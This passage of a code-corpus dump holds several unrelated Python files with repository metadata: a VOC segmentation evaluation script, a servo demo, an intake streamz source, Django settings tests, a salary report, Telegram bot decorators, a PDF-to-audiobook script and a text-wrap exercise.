self.char = char
self.is_blockable = is_blockable
self.is_stackable = is_stackable
def __repr__(self):
return "[{0} {1}]".format(self.shape, super().__repr__())
| 3.28125
| 3
|
evaluate_VOC_val.py
|
briqr/CSPN
| 17
|
12783940
|
# You can use this code to evaluate the trained model of CSPN on VOC validation data, adapted from SEC
import numpy as np
import pylab
import scipy.ndimage as nd
import imageio
from matplotlib import pyplot as plt
from matplotlib import colors as mpl_colors
import krahenbuhl2013
import sys
sys.path.insert(0,'/home/briq/libs/caffe/python')
import caffe
import scipy
caffe.set_device(0)
caffe.set_mode_gpu()
voc_classes = [ 'background',
'aeroplane',
'bicycle',
'bird',
'boat',
'bottle',
'bus',
'car',
'cat',
'chair',
'cow',
'diningtable',
'dog',
'horse',
'motorbike',
'person',
'pottedplant',
'sheep',
'sofa',
'train',
'tvmonitor',
]
max_label = 20
mean_pixel = np.array([104.0, 117.0, 123.0])
palette = [(0.0, 0.0, 0.0), (0.5, 0.0, 0.0), (0.0, 0.5, 0.0), (0.5, 0.5, 0.0),
(0.0, 0.0, 0.5), (0.5, 0.0, 0.5), (0.0, 0.5, 0.5), (0.5, 0.5, 0.5),
(0.25, 0.0, 0.0), (0.75, 0.0, 0.0), (0.25, 0.5, 0.0), (0.75, 0.5, 0.0),
(0.25, 0.0, 0.5), (0.75, 0.0, 0.5), (0.25, 0.5, 0.5), (0.75, 0.5, 0.5),
(0.0, 0.25, 0.0), (0.5, 0.25, 0.0), (0.0, 0.75, 0.0), (0.5, 0.75, 0.0),
(0.0, 0.25, 0.5)]
my_cmap = mpl_colors.LinearSegmentedColormap.from_list('Custom cmap', palette, 21)
def preprocess(image, size, mean_pixel=mean_pixel):
image = np.array(image)
image = nd.zoom(image.astype('float32'),
(size / float(image.shape[0]),
size / float(image.shape[1]), 1.0),
order=1)
image = image[:, :, [2, 1, 0]]
image = image - mean_pixel
image = image.transpose([2, 0, 1])
return image
def predict_mask(image_file, net, smooth=True):
im = pylab.imread(image_file)
net.blobs['images'].data[0] = preprocess(im, 321)
net.forward()
scores = np.transpose(net.blobs['fc8-SEC'].data[0], [1, 2, 0])
d1, d2 = float(im.shape[0]), float(im.shape[1])
scores_exp = np.exp(scores - np.max(scores, axis=2, keepdims=True))
probs = scores_exp / np.sum(scores_exp, axis=2, keepdims=True)
probs = nd.zoom(probs, (d1 / probs.shape[0], d2 / probs.shape[1], 1.0), order=1)
eps = 0.00001
probs[probs < eps] = eps
if smooth:
result = np.argmax(krahenbuhl2013.CRF(im, np.log(probs), scale_factor=1.0), axis=2)
else:
result = np.argmax(probs, axis=2)
return result
def evaluate(res, gt_img):
intersect_gt_res = np.sum( (res == gt_img) & (res!=0) & (gt_img!=0) )
union_gt_res = np.sum( (res!=0) | (gt_img!=0) )
acc = float(intersect_gt_res) / union_gt_res
return acc
model = '/home/briq/libs/CSPN/training/models/model_iter_3000.caffemodel'
draw = False
smoothing = True
if __name__ == "__main__":
num_classes = len(voc_classes)
gt_path = '/media/datasets/VOC2012/SegmentationClassAug/'
orig_img_path = '/media/datasets/VOC2012/JPEGImages/'
img_list_path = '/home/briq/libs/CSPN/list/val_id.txt'
with open(img_list_path) as f:
content = f.readlines()
f.close()
content = [x.strip() for x in content]
num_ims = 0
cspn_net = caffe.Net('deploy.prototxt', model, caffe.TEST)
for line in content:
img_name = line.strip()
gt_name = gt_path + img_name
gt_name = gt_name + '.png'
gt_img = imageio.imread(gt_name)
orig_img_name = orig_img_path + img_name
orig_img_name = orig_img_name + '.jpg'
res = predict_mask(orig_img_name, cspn_net, smooth=smoothing)
num_ims += 1
if(num_ims%100==0):
print '-----------------im:{}---------------------\n'.format(num_ims)
acc = evaluate(res, gt_img)
print img_name, str(num_ims), "{}%\n".format(acc*100)
if draw:
fig = plt.figure()
ax = fig.add_subplot('221')
ax.imshow(pylab.imread(orig_img_name))
plt.title('image')
ax = fig.add_subplot('222')
ax.matshow(gt_img, vmin=0, vmax=21, cmap=my_cmap)
plt.title('GT')
ax = fig.add_subplot('223')
ax.matshow(res, vmin=0, vmax=21, cmap=my_cmap)
plt.title('CSPN')
plt.show()
| 2.296875
| 2
|
example_snippets/multimenus_snippets/Snippets/SciPy/Physical and mathematical constants/CODATA physical constants/P/proton mass energy equivalent in MeV.py
|
kuanpern/jupyterlab-snippets-multimenus
| 0
|
12783941
|
<filename>example_snippets/multimenus_snippets/Snippets/SciPy/Physical and mathematical constants/CODATA physical constants/P/proton mass energy equivalent in MeV.py
constants.physical_constants["proton mass energy equivalent in MeV"]
| 1.265625
| 1
|
demo/due-server/servo.py
|
wovo/hwpy
| 0
|
12783942
|
<reponame>wovo/hwpy<filename>demo/due-server/servo.py
"""
Demo for a hobby servo
"""
import sys, time
sys.path.append( "../.." )
import hwpy
print( __doc__ )
servo = hwpy.servo( hwpy.gpo( hwpy.arduino.d2 ))
while True:
for x in range( 0, 100, 5 ):
servo.write( x / 100.0 )
time.sleep( 0.1 )
for x in range( 100, 0, -5 ):
servo.write( x / 100.0 )
time.sleep( 0.1 )
| 2.75
| 3
|
intake_streamz/source.py
|
martindurant/intake-streamz
| 7
|
12783943
|
from intake.source.base import DataSource
from intake.source import import_name
class StreamzSource(DataSource):
name = 'streamz'
container = 'streamz'
"""
"""
def __init__(self, method_chain, start=False, metadata=None, **kwargs):
"""
        method_chain: list[dict]
            Each element is a dict like {"method": name, "kwargs": {...}}, optionally
            with a "func_value" list naming kwarg entries to resolve via import_name;
            the methods are applied to the stream object in sequence.
"""
self.method = method_chain
self.kwargs = kwargs
self.stream = None
self.start = start
super().__init__(metadata=metadata)
def _get_schema(self):
import streamz
if self.stream is None:
stream = streamz.Stream
for part in self.method:
kw = part.get("kwargs", {})
for functional in part.get("func_value", []):
kw[functional] = import_name(kw[functional])
stream = getattr(stream, part["method"])(**part.get("kwargs", {}))
self.stream = stream
if self.start:
self.stream.start()
return {'stream': str(self.stream)}
def read(self):
self._get_schema()
return self.stream
def to_dask(self):
return self.read().scatter()
@property
def plot(self):
# override since there is no hvPlot(streamz), only streamz.hvPlot
try:
from hvplot import hvPlot
except ImportError:
raise ImportError("The intake plotting API requires hvplot."
"hvplot may be installed with:\n\n"
"`conda install -c pyviz hvplot` or "
"`pip install hvplot`.")
fields = self.metadata.get('fields', {})
for attrs in fields.values():
if 'range' in attrs:
attrs['range'] = tuple(attrs['range'])
s = self.read()
plot = s.plot
plot._metadata['fields'] = fields
plot._plots = self.metadata.get('plots', {})
s.start()
return plot
| 2.390625
| 2
|
code_styles/generate_styles.py
|
tylerbutler/shared_assets
| 0
|
12783944
|
# coding=utf-8
from pygments.formatters.html import HtmlFormatter
from pygments.styles import get_all_styles
__author__ = '<NAME> <<EMAIL>>'
'''
Run this script to output all registered Pygments styles as flat CSS files in the current directory.
Other styles that can be installed using pip:
pygments-style-github
pygments-style-railscasts
And some can be installed/downloaded manually...
https://github.com/john2x/solarized-pygment
https://github.com/brolewis/pygments_zenburn
https://github.com/oblique/pygments-style-behelit
https://github.com/idleberg/base16-pygments
'''
def main():
for style in get_all_styles():
formatter = HtmlFormatter(style=style)
css = formatter.get_style_defs()
filename = '%s.css' % style
with open(filename, mode='wb') as the_file:
the_file.writelines(css)
print "Output %s" % filename
if __name__ == '__main__':
main()
| 2.453125
| 2
|
gssapi/raw/named_tuples.py
|
E-Tahta/python-gssapi
| 2
|
12783945
|
from collections import namedtuple
AcquireCredResult = namedtuple('AcquireCredResult',
['creds', 'mechs', 'lifetime'])
InquireCredResult = namedtuple('InquireCredResult',
['name', 'lifetime', 'usage',
'mechs'])
InquireCredByMechResult = namedtuple('InquireCredByMechResult',
['name', 'init_lifetime',
'accept_lifetime', 'usage'])
AddCredResult = namedtuple('AddCredResult',
['creds', 'mechs', 'init_lifetime',
'accept_lifetime'])
DisplayNameResult = namedtuple('DisplayNameResult',
['name', 'name_type'])
WrapResult = namedtuple('WrapResult',
['message', 'encrypted'])
UnwrapResult = namedtuple('UnwrapResult',
['message', 'encrypted', 'qop'])
AcceptSecContextResult = namedtuple('AcceptSecContextResult',
['context', 'initiator_name',
'mech', 'token', 'flags', 'lifetime',
'delegated_creds', 'more_steps'])
InitSecContextResult = namedtuple('InitSecContextResult',
['context', 'mech', 'flags', 'token',
'lifetime', 'more_steps'])
InquireContextResult = namedtuple('InquireContextResult',
['initiator_name', 'target_name',
'lifetime', 'mech', 'flags',
'locally_init', 'complete'])
StoreCredResult = namedtuple('StoreCredResult',
['mechs', 'usage'])
IOVUnwrapResult = namedtuple('IOVUnwrapResult',
['encrypted', 'qop'])
InquireNameResult = namedtuple('InquireNameResult',
['attrs', 'is_mech_name', 'mech'])
GetNameAttributeResult = namedtuple('GetNameAttributeResult',
['values', 'display_values',
'authenticated', 'complete'])
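# Hedged usage sketch (illustrative, not part of the original module): the raw GSSAPI
# bindings return these tuples so results can be read by field name or unpacked.
if __name__ == "__main__":
    res = WrapResult(message=b"ciphertext", encrypted=True)
    assert res.encrypted and res.message == b"ciphertext"
    message, encrypted = res  # namedtuples also unpack like plain tuples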
| 2.046875
| 2
|
cos_tests/test_base.py
|
baylee-d/cos.io
| 0
|
12783946
|
<reponame>baylee-d/cos.io
import pytest # noqa
from django.test import TestCase
import website.settings.base as base
import os
from urllib.parse import urlparse
class VariableValueTest(TestCase):
def test_project_dir(self):
""" Checks that the directory for the project is pointing to the right place """
test_project_directory = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) + "/website"
project_directory = base.PROJECT_DIR
self.assertEqual(project_directory, test_project_directory, 'the project directories were not equal')
def test_base_dir(self):
""" Checks that the base directory is pointing to the right place """
test_base_directory = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
base_directory = base.BASE_DIR
self.assertEqual(base_directory, test_base_directory, 'the base directories were not equal')
def test_email_host(self):
""" Checks that the email host is correct """
test_email_host = 'smtp.sendgrid.net'
email_host = base.EMAIL_HOST
self.assertEqual(email_host, test_email_host, 'email hosts were not equal')
def test_email_host_user(self):
""" Checks that the email_host_user variable is correct """
test_email_host_user = os.environ.get('SENDGRID_USERNAME')
email_host_user = base.EMAIL_HOST_USER
self.assertEqual(email_host_user, test_email_host_user, 'email host users were not equal')
def test_email_host_password(self):
""" Checks that the email host password is correct """
test_email_host_pass = os.environ.get('SENDGRID_PASSWORD')
email_host_pass = base.EMAIL_HOST_PASSWORD
self.assertEqual(email_host_pass, test_email_host_pass, 'email user passwords were not equal')
def test_email_port(self):
""" Checks the email port """
email_port = base.EMAIL_PORT
self.assertEqual(email_port, 587)
def test_email_use_tls(self):
""" Checks the property """
email_use_tls = base.EMAIL_USE_TLS
self.assertEqual(email_use_tls, True)
def test_es_url(self):
""" Checks the variable """
test_es_url = urlparse(os.environ.get('BONSAI_URL') or 'http://127.0.0.1:9200/')
es_url = base.ES_URL
self.assertEqual(es_url, test_es_url, 'the es_urls did not match')
def test_haystack_connections(self):
""" Checks the condition that there is or isn't an es_url_username """
es_url = urlparse(os.environ.get('BONSAI_URL') or 'http://127.0.0.1:9200/')
test_haystack_connections = {
'default': {
'ENGINE': 'haystack.backends.elasticsearch_backend.'
'ElasticsearchSearchEngine',
'URL': es_url.scheme + '://' + es_url.hostname + ':9200',
'INDEX_NAME': 'haystack',
},
}
if es_url.username:
test_haystack_connections['default']['KWARGS'] = {
"http_auth": es_url.username + ':' + es_url.password}
haystack_connections = base.HAYSTACK_CONNECTIONS
self.assertEqual(haystack_connections, test_haystack_connections, 'the es_url did not have a username, resulting in no haystack connections')
def test_site_id(self):
""" Checks that the site id is equal to the site id of the environment """
test_site_id = os.environ.get('SITE_ID')
site_id = base.SITE_ID
self.assertEqual(site_id, test_site_id, 'the site ids were not equal')
def test_redis_url(self):
""" Checks the redis url """
test_redis_url = urlparse(os.environ.get('REDIS_URL') or 'http://127.0.0.1:6379')
redis_url = base.redis_url
self.assertEqual(redis_url, test_redis_url, 'the redis urls were not equal')
def test_caches(self):
""" Tests that the redis caches point to the right places """
caches = {
"default": {
"BACKEND": "redis_cache.RedisCache",
"LOCATION": "{0}:{1}".format(base.redis_url.hostname, base.redis_url.port),
"OPTIONS": {
"PASSWORD": base.redis_url.password,
"DB": 0,
}
}
}
base_caches = base.CACHES
self.assertEqual(base_caches, caches, 'the cache information was not equal')
def test_static_file_dirs(self):
""" Tests that the location of the static directory files is correct """
staticfiles_dirs = [
os.path.join(base.PROJECT_DIR, 'static'),
]
base_staticfiles_dirs = base.STATICFILES_DIRS
self.assertEqual(base_staticfiles_dirs, staticfiles_dirs, 'static file directories were not the same')
def test_static_root(self):
""" Tests the location of the static root """
base_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
test_static_root = os.path.join(base_dir, 'static')
static_root = base.STATIC_ROOT
self.assertEqual(static_root, test_static_root, 'static roots were not equal to each other')
def test_media_root(self):
""" Tests the location of the media root """
base_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
test_media_root = os.path.join(base_dir, 'media')
media_root = base.MEDIA_ROOT
self.assertEqual(media_root, test_media_root, 'media roots were not equal to each other')
def test_base_url(self):
""" Tests the base url for the wagtail site to make sure it goes to the cos.io site """
base_url = base.BASE_URL
self.assertEqual(base_url, 'http://cos.io')
| 2.71875
| 3
|
optic_store/optic_store/report/salary_report_for_bank/salary_report_for_bank.py
|
iptelephony/optic_store
| 14
|
12783947
|
<gh_stars>10-100
# Copyright (c) 2013, 9T9IT and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from functools import partial
from toolz import compose, pluck, concatv, merge, groupby, excepts, first
from optic_store.utils import pick
from optic_store.utils.report import make_column, with_report_generation_time
def execute(filters=None):
columns = _get_columns(filters)
keys = compose(list, partial(pluck, "fieldname"))(columns)
clauses, values = _get_filters(filters)
data = _get_data(clauses, values, keys)
return columns, data
def _get_columns(filters):
return [
make_column("bank_name", "BANK CODE", width=90),
make_column("bank_ac_no", "CREDIT ACCOUNT NO", width=150),
make_column("employee_name", "EMP NAME", width=150),
make_column("amount", "AMOUNT", type="Currency"),
make_column("remarks", "REMARKS", width=150),
make_column("placeholder1", "PAYMENT_PRODUCT"),
make_column("placeholder2", "TXN_CCY"),
make_column("placeholder3", "SWIFT_CHARGING_OPT"),
make_column("placeholder3", "PAYMENT_VALUE_DATE"),
make_column("account_number", "DEBIT_ACCOUNT NUMBER", width=150),
]
def _get_filters(filters):
join_clauses = compose(lambda x: " AND ".join(x), concatv)
get_components = compose(
list,
partial(pluck, "salary_component"),
lambda x: frappe.get_all(
"Optical Store HR Settings Salary Component",
fields=["salary_component"],
filters={"parentfield": "{}_components".format(x)},
),
lambda x: x.replace(" ", "_").lower(),
)
values = merge(filters, {"components": get_components(filters.get("report_type"))})
return (
join_clauses(["sl.status = %(status)s", "sl.start_date = %(start_date)s"]),
values,
)
def _get_data(clauses, values, keys):
result = frappe.db.sql(
"""
SELECT
e.bank_name AS bank_name,
e.bank_ac_no AS bank_ac_no,
e.employee_name AS employee_name,
sl.name AS salary_slip,
sl.start_date AS start_date,
a.account_number AS account_number
FROM `tabSalary Slip` AS sl
LEFT JOIN `tabEmployee` AS e ON e.name = sl.employee
LEFT JOIN `tabPayroll Entry` AS pe ON pe.name = sl.payroll_entry
LEFT JOIN `tabAccount` AS a ON a.name = pe.payment_account
WHERE {clauses}
""".format(
clauses=clauses
),
values=values,
as_dict=1,
)
get_amounts = compose(
partial(groupby, "salary_slip"),
lambda type: frappe.db.sql(
"""
SELECT
sl.name AS salary_slip,
SUM(sd.amount) AS amount
FROM `tabSalary Detail` AS sd
LEFT JOIN `tabSalary Slip` AS sl ON sl.name = sd.parent
WHERE
sd.parentfield = %(parentfield)s AND
sd.parent IN %(salary_slips)s AND
sd.salary_component IN %(components)s
GROUP BY sl.name
""",
values=merge(
values,
{
"salary_slips": [x.get("salary_slip") for x in result],
"parentfield": type,
},
),
as_dict=1,
)
if result
else {},
)
get_amount = compose(
lambda x: x.get("amount", 0),
excepts(StopIteration, first, lambda _: {}),
lambda col, key: col.get(key, []),
)
earnings = get_amounts("earnings")
deductions = get_amounts("deductions")
def add_remarks(row):
start_date = row.get("start_date")
return merge(
row, {"remarks": "{} SAL".format(start_date.strftime("%b").upper())}
)
def set_amounts(row):
salary_slip = row.get("salary_slip")
amount = get_amount(earnings, salary_slip) - get_amount(deductions, salary_slip)
return merge(row, {"amount": amount})
make_row = compose(partial(pick, keys), add_remarks, set_amounts)
return with_report_generation_time([make_row(x) for x in result], keys)
| 1.789063
| 2
|
bot/decorators.py
|
MrLokans/bank_telegram_bot
| 2
|
12783948
|
<gh_stars>1-10
"""
Useful decorators
"""
import functools
import telegram
from bot.exceptions import BotLoggedError
from bot.settings import logging
logger = logging.getLogger('telegrambot')
def log_exceptions(bot_func):
@functools.wraps(bot_func)
def wrapper(bot, update, *args, **kwargs):
try:
bot_func(bot, update, *args, **kwargs)
except BotLoggedError as e:
chat_id = update.message.chat_id
msg = str(e)
bot.sendMessage(chat_id=chat_id,
text=msg,
parse_mode=telegram.ParseMode.HTML)
return
except Exception as e:
logger.exception("Unknown exception occured.")
return
return wrapper
def log_statistics(bot_func):
@functools.wraps(bot_func)
def wrapper(bot, update, *args, **kwargs):
message = update.message.text
user_id = str(update.message.from_user.id)
chat_id = update.message.chat_id
msg = "{} triggered, user_id: {}, chat_id {}"
logger.info(msg.format(message, user_id, chat_id))
bot_func(bot, update, *args, **kwargs)
return wrapper
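# Hedged usage sketch (not part of the original module): the decorators are meant to
# wrap python-telegram-bot style handlers; the handler below is a stand-in example.
@log_exceptions
@log_statistics
def example_start_handler(bot, update):
    bot.sendMessage(chat_id=update.message.chat_id,
                    text="Hello!",
                    parse_mode=telegram.ParseMode.HTML)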
| 2.46875
| 2
|
AudioBook GUI code/main.py
|
GuruprasadaShridharHegde/Python-AudioBook
| 1
|
12783949
|
from tkinter import Tk
from tkinter.filedialog import askopenfilename
from gtts import gTTS
import PyPDF2
import os
Tk().withdraw()
filelocation = askopenfilename()
basename = os.path.basename(filelocation)
filename = os.path.splitext(basename)[0]
language = 'en'
output_text = ''
with open(filelocation, 'rb') as f:
    text = PyPDF2.PdfFileReader(f, strict=False)
    print(text.numPages)
    # pages must be extracted while the PDF file is still open
    for pagenum in range(0, text.numPages):
        pageObj = text.getPage(pagenum)
        output_text = output_text + pageObj.extractText()
output = gTTS(text=output_text, lang=language, slow=False)
output.save(filename + ".mp3")
| 3.09375
| 3
|
__Training__/Python - HackerRank/3. Strings/Text Wrap.py
|
JUD210/Study-Note
| 0
|
12783950
|
# https://www.hackerrank.com/challenges/text-wrap/problem
import textwrap
def wrap(string, max_width):
# return "\n".join(string[i:i+max_width] for i in range(0, len(string), max_width))
return textwrap.fill(string, max_width)
if __name__ == "__main__":
string, max_width = input(), int(input())
# ABCDEFGHIJKLIMNOQRSTUVWXYZ
# 4
result = wrap(string, max_width)
print(result)
# ABCD
# EFGH
# IJKL
# IMNO
# QRST
# UVWX
# YZ
| 3.890625
| 4
|